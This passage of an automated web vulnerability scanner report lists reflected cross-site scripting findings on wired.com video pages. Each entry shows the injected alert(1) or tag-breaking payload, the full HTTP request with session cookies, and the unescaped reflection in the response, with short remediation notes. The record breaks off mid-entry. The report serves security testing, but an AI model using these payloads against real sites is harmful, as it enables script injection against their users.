1.1042. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96572"-alert(1)-"8ce4e8daf48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/181581663396572"-alert(1)-"8ce4e8daf48/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 00:49:25 GMT
Date: Mon, 22 Nov 2010 00:44:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "181581663396572"-alert(1)-"8ce4e8daf48","latest-videos","latest","653293411001","back-to-the-future-physics-the-river-of-time","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1043. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd377"-alert(1)-"b5566d1a53d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-timefd377"-alert(1)-"b5566d1a53d/653293411001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:58 GMT
Date: Mon, 22 Nov 2010 00:44:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
ipt type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","653293411001","back-to-the-future-physics-the-river-of-timefd377"-alert(1)-"b5566d1a53d","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1044. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5349f"-alert(1)-"5db7cf1b00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/6532934110015349f"-alert(1)-"5db7cf1b00 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:50:03 GMT
Date: Mon, 22 Nov 2010 00:45:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "6532934110015349f"-alert(1)-"5db7cf1b00","latest-videos","latest","1815816633","back-to-the-future-physics-the-river-of-time","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1045. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 99d40--><script>alert(1)</script>9411b968572 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video99d40--><script>alert(1)</script>9411b968572/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29460
Vary: Accept-Encoding
Cache-Control: max-age=277
Expires: Mon, 22 Nov 2010 00:40:36 GMT
Date: Mon, 22 Nov 2010 00:35:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video99d40--><script>alert(1)</script>9411b968572/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001
-->
...[SNIP]...

1.1046. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e59"><a>4921c5333d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video22e59"><a>4921c5333d1/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29421
Vary: Accept-Encoding
Cache-Control: max-age=295
Expires: Mon, 22 Nov 2010 00:39:54 GMT
Date: Mon, 22 Nov 2010 00:34:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video22e59"><a>4921c5333d1 ss_latest-videos c_latest">
...[SNIP]...

1.1047. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1779"><a>34b474d6ab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videosc1779"><a>34b474d6ab2/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=271
Expires: Mon, 22 Nov 2010 00:40:36 GMT
Date: Mon, 22 Nov 2010 00:36:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videosc1779"><a>34b474d6ab2 c_latest">
...[SNIP]...

1.1048. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 231ac"-alert(1)-"9a0830762d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos231ac"-alert(1)-"9a0830762d1/latest/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:09 GMT
Date: Mon, 22 Nov 2010 00:37:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","1815816633","latest-videos231ac"-alert(1)-"9a0830762d1","676257685001","battle-los-angeles-trailer","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1049. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e72e5"><a>daaf07f0b88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/lateste72e5"><a>daaf07f0b88/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:42:06 GMT
Date: Mon, 22 Nov 2010 00:37:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_lateste72e5"><a>daaf07f0b88">
...[SNIP]...

1.1050. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad97a"-alert(1)-"e1623f9f7aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestad97a"-alert(1)-"e1623f9f7aa/1815816633/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:14 GMT
Date: Mon, 22 Nov 2010 00:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latestad97a"-alert(1)-"e1623f9f7aa","latest-videos","1815816633","676257685001","battle-los-angeles-trailer","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1051. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae6c6"-alert(1)-"a7781cc6a32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633ae6c6"-alert(1)-"a7781cc6a32/battle-los-angeles-trailer/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:30 GMT
Date: Mon, 22 Nov 2010 00:38:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","676257685001","1815816633ae6c6"-alert(1)-"a7781cc6a32","battle-los-angeles-trailer","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1052. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57180"-alert(1)-"e82ff3c20cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/battle-los-angeles-trailer57180"-alert(1)-"e82ff3c20cc/676257685001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=277
Expires: Mon, 22 Nov 2010 00:43:17 GMT
Date: Mon, 22 Nov 2010 00:38:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","battle-los-angeles-trailer57180"-alert(1)-"e82ff3c20cc","676257685001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1053. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f41"-alert(1)-"ec58efd1064 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001c5f41"-alert(1)-"ec58efd1064 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=296
Expires: Mon, 22 Nov 2010 00:43:50 GMT
Date: Mon, 22 Nov 2010 00:38:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106728


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","676257685001c5f41"-alert(1)-"ec58efd1064","battle-los-angeles-trailer","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1054. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c71e2--><script>alert(1)</script>6815d60c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoc71e2--><script>alert(1)</script>6815d60c49/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29477
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:39 GMT
Date: Mon, 22 Nov 2010 00:36:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoc71e2--><script>alert(1)</script>6815d60c49/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001
-->
...[SNIP]...

1.1055. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a36"><a>69c504b8c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoa9a36"><a>69c504b8c86/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
